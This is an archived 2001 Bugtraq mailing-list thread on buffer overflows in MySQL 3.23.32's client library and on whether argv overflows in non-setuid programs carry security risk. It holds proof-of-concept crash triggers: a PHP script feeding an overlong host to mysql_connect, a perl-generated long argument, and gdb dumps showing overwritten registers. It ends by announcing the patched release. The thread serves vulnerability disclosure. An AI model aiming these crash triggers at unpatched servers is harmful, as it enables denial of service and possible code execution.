6084815 2001-02-11 00:40 +0100 /32 rader/ Konrad Rieck <kr@R0Q.CX>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-12 21:06 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: kr@R0Q.CX
Mottagare: Bugtraq (import) <15365>
Kommentar till text 6077459 av Joao Gouveia <tharbad@KAOTIK.ORG>
Ärende: Re: Some more MySql security issues
------------------------------------------------------------
From: Konrad Rieck <kr@R0Q.CX>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010211004048.A9515@inf.fu-berlin.de>
I am a little bit confused about this mail. Maybe the author
can explain some issues to me...
On Sat, Feb 10, 2001 at 12:54:33AM -0000, Joao Gouveia wrote:
> roberto@spike:~ > mysql -ublaah (Note: 'blaah' obviously isn't a valid
> username)
You seem to have a strange configuration of mysql. By default only
valid users are allowed to connect to the database. So the overflow
in "drop database" can only be used by users of mysql. Well anyway, a
security problem that can lead to the privileges the mysqld is
running under, but not as simple as you show above.
> /home/jroberto/httpd/mysql/bin/mysql -h`perl -e'printf("A"x200)'`
This is a nice example of bad code, but not a security issue, I could
show up a 100 of programs that simply don't care for *argv
parameters. You don't gain anything by exploiting such overflows in
non-suid programs.
Regards,
Konrad
-- Konrad Rieck <kr@r0q.cx> Roqefellaz - http://www.r0q.cx, GPG
Public Key http://www.r0q.cx/keys/kr.pub
-- Fingerprint: 3AA8 CF92 C179 9760 C3B3 1B43 33B6 9221 AFBF 5897
(6084815) --------------------------------(Ombruten)
6086241 2001-02-12 22:19 +0100 /50 rader/ Konrad Rieck <kr@R0Q.CX>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-13 04:19 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: kr@R0Q.CX
Mottagare: Bugtraq (import) <15394>
Kommentar till text 6086297 av Tim Yardley <yardley@UIUC.EDU>
Sänt: 2001-02-13 06:17
Ärende: Re: Some more MySql security issues
------------------------------------------------------------
From: Konrad Rieck <kr@R0Q.CX>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010212221920.A4665@inf.fu-berlin.de>
On Mon, Feb 12, 2001 at 02:34:43PM -0600, Tim Yardley wrote:
> >This is a nice example of bad code, but not a security issue, I could
> >show up a 100 of programs that simply don't care for *argv parameters.
> >You don't gain anything by exploiting such overflows in non-suid programs.
>
> watch what you say there. there have been hundreds of programs that have
> been exploited via argv params. a bof is a bof.. regardless of where it
> is. also, just because you don't gain anything doesnt mean that the
> problem shouldnt be documented and fixed.
A bof is a bof. You are completely right, but as I said and I still
believe so, most buffer overflows are just bad coding practice. Don't
get confused by all that hype, there are far more applications with
buffer overflows in argv that are definitely not security relevant
than security relevant ones.
> lastly, you stated that nothing
> is gained by overflowing non-suid programs. that statement is obviously
> innaccurate. if you gain ANY uid/gid (etc etc) that is not in your
> currrent list, you are changing your privledges on the system. whether or
> not it is a ROOT compromise is a whole different matter.
Maybe I was expressing a little bit too sloppy, buf if I consider
applications that are non-suid (so no set-uid occurs), e.g. the mysql
command, there is nothing special about overflows in the
*argv parameters, it's just bad code. This is special to those command
line parameters since they are only given by the user who is executing
the program.
I am not talking about general problems with buffer overflow or any
other technique that might allow overwriting the stack, but in this
case the user who is sending the content to the stack, is the one
that can execute it - privileges are not changed.
Maybe you can explain, how I will change my privileges on a system,
when executing exactly such overflows, I can't see it.
Regards,
Konrad
-- Konrad Rieck <kr@r0q.cx> Roqefellaz - http://www.r0q.cx, GPG
Public Key http://www.r0q.cx/keys/kr.pub
-- Fingerprint: 3AA8 CF92 C179 9760 C3B3 1B43 33B6 9221 AFBF 5897
(6086241) --------------------------------(Ombruten)
6091561 2001-02-12 17:20 -0300 /151 rader/ Hector A.Paterno <apmailing@FIBERTEL.COM.AR>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-13 22:41 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: apmailing@FIBERTEL.COM.AR
Mottagare: Bugtraq (import) <15413>
Ärende: Re: Some more MySql security issues
------------------------------------------------------------
From: "Hector A.Paterno" <apmailing@FIBERTEL.COM.AR>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01021217200000.01981@PlayBox>
On Monday 12 February 2001 18:22, you wrote:
> ----- Original Message -----
> From: "Joao Gouveia" <tharbad@KAOTIK.ORG>
> To: <BUGTRAQ@SECURITYFOCUS.COM>
> Sent: Friday, February 09, 2001 9:54 PM
> Subject: Some more MySql security issues
>
> > Hi,
> >
> > MySql staff has been notified regarding this issues on 2001-01-26.
> >
> > There still are some potential security flaws with MySql lastest stable
> > release.
> > Follows some tests i've made all with:
> >
> > MySql v3.23.32
> > PHP v4.0.4pl1 (static)
> > apache-1.3.14
> >
> > Let's look at a pratical example:
> > A simple php script:
> > <?
> > for ( $i=0 ; $i<= $buffer-1 ; ++$i )
> > $host.="A";
> >
> > $cid = mysql_connect($host,$usr,$pwd);
> > ?>
> > Let's run apache ( latest version compiled with latest version of PHP )
> > in debugging mode to see what hapens:
> > <quote>
> > spike:~ # gdb /www/bin/httpd
> > ...
> > (gdb) run -X
> > Starting program: /www/bin/httpd -X
> > </quote>
> > On our browser we issue: test.php?buffer=120
> > gdb shows the following
> > <quote>
> > Program received signal SIGSEGV, Segmentation fault.
> > 0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > (gdb) bt
> > #0 0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > #1 0x41414141 in ?? ()
> > (gdb) inf reg
> > eax 0x82010c0 136319168
> > ecx 0x3 3
> > edx 0x82010f4 136319220
> > ebx 0x40046324 1074029348
> > esp 0xbfffdc30 0xbfffdc30
> > ebp 0xbfffdfbc 0xbfffdfbc
> > esi 0x8204ba5 136334245
> > edi 0x41414141 1094795585
> > eip 0x40030cf3 0x40030cf3
> > eflags 0x10203 66051
> > cs 0x23 35
> > ss 0x2b 43
> > ds 0x2b 43
> > es 0x2b 43
> > fs 0x0 0
> > gs 0x0 0
> > (gdb)
> > </quote>
Lets try this problem :
Secenario :
Debian Woody.
mysql Ver 11.11 Distrib Mysql 3.23.31
Apache 1.3.14
php 4.0.4pl1
StuffBox:/usr/sbin# gdb apache GNU gdb 5.0 Copyright 2000 Free
Software Foundation, Inc. GDB is free software, covered by the GNU
General Public License, and you a welcome to change it and/or
distribute copies of it under certain conditio Type "show copying" to
see the conditions. There is absolutely no warranty for GDB. Type
"show warranty" for details This GDB was configured as
"i686-pc-linux-gnu"... (no debugging symbols found)... (gdb) run -X
Starting program: /usr/sbin/apache -X [..]
On the other machine I wirte this script :
<?
for ( $i=0 ; $i<= $buffer-1 ; ++$i )
$host.="A";
$cid = mysql_connect($host,$usr,$pwd);
?>
and uploaded to my public_html in StuffBox ( The Box That is running apache +
mysql + php ).
and test from other site some buffers lengths :
200:
PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=200
StuffBox :
Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0 0x40182e9d in inet_aton () from /lib/libc.so.6
#1 0x40182e52 in inet_addr () from /lib/libc.so.6
#2 0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax 0x401ba160 1075552608
ecx 0x0 0
edx 0x2 2
ebx 0x401b9474 1075549300
esp 0xbfffe27c 0xbfffe27c
ebp 0xbfffe2b4 0xbfffe2b4
esi 0x61697620 1634301472
edi 0x6 6
eip 0x40182e9d 0x40182e9d
500 :
PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=500
rogram received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0 0x40182e9d in inet_aton () from /lib/libc.so.6
#1 0x40182e52 in inet_addr () from /lib/libc.so.6
#2 0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax 0x401ba160 1075552608
ecx 0x0 0
edx 0x2 2
ebx 0x401b9474 1075549300
esp 0xbfffe27c 0xbfffe27c
ebp 0xbfffe2b4 0xbfffe2b4
esi 0x41414141 1094795585 <<=
edi 0x6 6
eip 0x40182e9d 0x40182e9d
Cya.
(6091561) --------------------------------(Ombruten)
6091773 2001-02-13 03:55 +0000 /25 rader/ Joao Gouveia <tharbad@KAOTIK.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-13 23:11 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: tharbad@kaotik.org
Mottagare: Bugtraq (import) <15417>
Kommentar till text 6086241 av Konrad Rieck <kr@R0Q.CX>
Ärende: Re: Some more MySql security issues
------------------------------------------------------------
From: Joao Gouveia <tharbad@KAOTIK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <007101c09570$c8ee2560$0400a8c0@corbusier.org>
----- Original Message -----
From: "Konrad Rieck" <kr@R0Q.CX>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Monday, February 12, 2001 9:19 PM
Subject: Re: Some more MySql security issues
> Maybe you can explain, how I will change my privileges on a system, when
> executing exactly such overflows, I can't see it.
Maybe in a situation where executing arbitrary code isn't one of your
previleges. Like for example a web hosting service that offers
mysql+php (safe_mode) and no shell access.
Best regards,
Joao Gouveia
--------------
tharbad@kaotik.org
(6091773) --------------------------------(Ombruten)
6092187 2001-02-13 12:49 -0600 /68 rader/ Tim Yardley <yardley@UIUC.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-14 00:39 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: yardley@UIUC.EDU
Mottagare: Bugtraq (import) <15425>
Kommentar till text 6086241 av Konrad Rieck <kr@R0Q.CX>
Ärende: Re: Some more MySql security issues
------------------------------------------------------------
From: Tim Yardley <yardley@UIUC.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <5.0.2.1.2.20010213123822.085be5f8@students.uiuc.edu>
At 03:19 PM 2/12/2001, Konrad Rieck wrote:
>A bof is a bof. You are completely right, but as I said and I still believe
>so, most buffer overflows are just bad coding practice. Don't get confused
>by all that hype, there are far more applications with buffer overflows
>in argv that are definitely not security relevant than security relevant
>ones.
Yes, I agree that they are typically bad coding practice... or at
least oversights. As for security relevance, that is all a matter of
context... but I will leave that cat in the box.
> > lastly, you stated that nothing
> > is gained by overflowing non-suid programs. that statement is obviously
> > innaccurate. if you gain ANY uid/gid (etc etc) that is not in your
> > currrent list, you are changing your privledges on the system. whether or
> > not it is a ROOT compromise is a whole different matter.
>
>Maybe I was expressing a little bit too sloppy, buf if I consider
>applications that are non-suid (so no set-uid occurs), e.g. the mysql
There are still the cases of capabilities, privledges, etc etc.
These pertain more to TOS's than others, however the TOS movement has
expanded into the standard free unix environment, albeit in limited
form. The point to make here is that setuid/setgid bits are not the
only things that could cause you to gain something you didnt have
before.
A simple theoretical example, say you grant a privledge to a binary
such that it can open a port < 1024, and you do so to eliminate the
need to make the process setuid. Now, someone overflows a command
line argument in that application such that they sucessfully gain the
privledge of binding to a low port that the application had
previously. Note that I say successfully due to the fact that a lot
of TOS implementations drop privs on exec, so one would have to be
more crafty than that (raw shell image replacement and execution
based on manipulated eip).
Another possibility is a case in which the offensive program is
wrapped or used by another that *IS* privledged. Or simply a case in
which there is an overflow in a library (which was one off the cases
here). All of these are bad in varying degrees.
>Maybe you can explain, how I will change my privileges on a system, when
>executing exactly such overflows, I can't see it.
see above.
alas though, this is all a moot point. all that needs to be said is
that by convention on bugtraq, people associate setuid with setuid(0)
and any other case is referred to as setuid man or setgid man, etc
etc. I was just clarifying the fact that you must be careful when
saying setuid in a forum that typically associates that with root
privs.
/tmy
-- Diving into infinity my consciousness expands in inverse
proportion to my distance from singularity
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- -
--------------+
| Tim Yardley (yardley@uiuc.edu)
| http://www.students.uiuc.edu/~yardley/
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- -
--------------+
(6092187) --------------------------------(Ombruten)
6092295 2001-02-13 11:40 +0000 /21 rader/ Joao Gouveia <tharbad@KAOTIK.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-14 01:53 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: tharbad@kaotik.org
Mottagare: Bugtraq (import) <15431>
Ärende: MySql new version
------------------------------------------------------------
From: Joao Gouveia <tharbad@KAOTIK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <200102131140.LAA29405@srvlis11.teleweb.pt>
Hi,
MySql version 3.23.33 has been released, addressing this latest problems.
Change log in http://www.mysql.com/doc/N/e/News-3.23.33.html
<quote>
Fixed buffer overrun in libmysqlclient library. Fixed bug in handling STOP
event after ROTATE event in replication.
Fixed another buffer overrun in DROP DATABASE.
</quote>
Regards,
Joao Gouveia
------------
tharbad@kaotik.org
(6092295) ------------------------------------------